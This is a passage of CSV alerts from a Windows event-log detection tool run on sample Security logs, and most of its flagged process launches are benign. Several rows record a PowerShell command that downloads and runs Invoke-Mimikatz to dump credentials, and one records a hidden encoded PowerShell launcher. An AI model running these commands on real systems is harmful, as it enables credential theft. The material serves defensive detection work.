""C:\Windows\system32\eventvwr.msc"" | Path: C:\Windows\System32\mmc.exe | PID: 0xf74 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 06:30:06.203 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"" ""IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x2a4 | 
User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 06:30:06.203 +09:00,IE10Win7,4688,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 06:38:23.076 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"" ""IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xa9c | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 06:38:23.076 +09:00,IE10Win7,4688,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 06:51:10.232 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"" ""IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x4fc | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 06:51:10.232 +09:00,IE10Win7,4688,high,ResDev,Relevant Anti-Virus 
Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 06:51:19.681 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"" ""IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xe70 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 06:51:19.681 +09:00,IE10Win7,4688,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 07:00:00.553 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" | Path: C:\Windows\System32\schtasks.exe | PID: 0x97c | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 07:01:50.906 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xd1c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 07:01:50.943 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe 
/Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x904 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 07:42:19.877 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xc34 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 07:42:28.120 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0xbf4 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 07:42:44.834 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0xd18 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 07:43:00.291 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x3a8 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 
+2016-08-25 07:43:04.576 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\hp2phgfx.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | PID: 0xd50 | User: IEUser | LID: 0x4d011",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 07:44:00.792 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xd08 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 07:44:00.843 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xb70 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 07:44:02.654 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\lnyiquaj.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | PID: 0x818 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 07:45:43.530 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe 
/Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xce4 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 07:45:43.908 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x3a0 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 07:45:45.304 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\zqai1ke3.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | PID: 0xb8c | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 07:45:54.936 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xe48 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 07:45:54.972 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xf88 | User: IE10WIN7$ | LID: 
0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 07:45:57.041 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\lygfnats.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | PID: 0x21c | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 07:47:33.985 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xcd8 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 07:47:34.016 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xd48 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 07:49:42.000 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\findstr.exe"" ""Command Line"" | Path: C:\Windows\System32\findstr.exe | PID: 0x708 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 07:50:40.032 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible 
LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\findstr.exe"" Command | Path: C:\Windows\System32\findstr.exe | PID: 0x6e0 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 07:53:47.579 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\findstr.exe"" ""Command Line"" | Path: C:\Windows\System32\findstr.exe | PID: 0xebc | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 07:54:04.375 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\findstr.exe"" ""Command Line"" | Path: C:\Windows\System32\findstr.exe | PID: 0xb78 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 07:59:07.782 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\findstr.exe"" csc | Path: C:\Windows\System32\findstr.exe | PID: 0x9c8 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 08:01:26.782 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0xa00 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 08:01:26.782 +09:00,IE10Win7,4688,low,,Suspicious Cmd 
Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0x5b8 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-26 00:03:05.916 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x108 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-26 00:03:06.884 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0xc34 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-26 00:03:06.931 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0xfcc | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-26 00:03:25.697 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x6fc | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 
+2016-08-26 00:04:55.947 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"" ""IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x764 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-26 00:04:55.947 +09:00,IE10Win7,4688,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-26 00:23:21.642 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" Scan -ScheduleJob -WinTask -RestrictPrivilegesScan | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0xe54 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-26 00:23:21.658 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" Scan -ScheduleJob -WinTask -RestrictPrivilegesScan -Reinvoke | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0x500 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-26 00:23:21.658 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" SignaturesUpdateService -ScheduleJob | Path: C:\Program Files\Windows 
Defender\MpCmdRun.exe | PID: 0x958 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-26 00:25:21.642 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\rundll32.exe aepdu.dll,AePduRunUpdate | Path: C:\Windows\System32\rundll32.exe | PID: 0x7d4 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-26 00:38:00.158 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xc60 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-26 05:43:45.656 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x318 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-26 05:43:48.234 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x488 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-26 05:44:06.459 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: 
C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x64c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-26 05:46:45.647 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" | Path: C:\Windows\System32\schtasks.exe | PID: 0xb5c | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-26 05:58:45.022 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x780 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-26 05:58:46.850 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Users\IEUser\Desktop\launcher.bat"" "" | Path: C:\Windows\System32\cmd.exe | PID: 0x9c0 | User: IEUser | LID: 0x4d011",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-26 05:58:46.881 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: powershell.exe -NoP -sta -NonI -W Hidden -Enc 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 | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xfe0 | User: IEUser | LID: 
0x4d011,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-26 05:58:46.881 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: cmd /c del ""C:\Users\IEUser\Desktop\launcher.bat"" | Path: C:\Windows\System32\cmd.exe | PID: 0xa48 | User: IEUser | LID: 0x4d011",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-26 06:11:59.064 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\gpedit.msc"" | Path: C:\Windows\System32\mmc.exe | PID: 0xf20 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-26 07:17:58.251 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x500 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-26 07:17:58.259 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0xa9c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-27 05:34:50.038 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: sc.exe start sppsvc | Path: C:\Windows\System32\sc.exe | PID: 0x700 | User: IE10WIN7$ | LID: 
0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-27 05:34:50.394 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" | Path: C:\Windows\System32\schtasks.exe | PID: 0xb98 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-27 05:34:51.064 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0xed8 | User: IE10WIN7$ | LID: 